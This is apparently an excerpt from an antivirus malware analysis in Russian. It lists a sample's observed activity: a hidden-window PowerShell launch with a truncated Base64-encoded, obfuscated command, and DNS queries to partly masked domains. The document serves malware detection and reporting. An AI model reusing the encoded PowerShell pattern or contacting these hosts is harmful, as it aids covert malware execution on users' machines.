Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAGYAbgBnAHYAcgBmAG4APQAnAEwAbgBjAGcAZgBnAGgAYwBvAHoAdQAnADsAJABCAGcAZABwAG8AYwBqAHUAcABsAHEAcQBiAC...
- DNS ASK ph###-aidrx.com
- DNS ASK bh####hasthol.com
- DNS ASK pr####tolynx.com
- DNS ASK kk##93.com
- DNS ASK ku####r.ilmci.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAGYAbgBnAHYAcgBmAG4APQAnAEwAbgBjAGcAZgBnAGgAYwBvAHoAdQAnADsAJABCAGcAZABwAG8AYwBqAHUAcABsAHEAcQBiAC...' (со скрытым окном)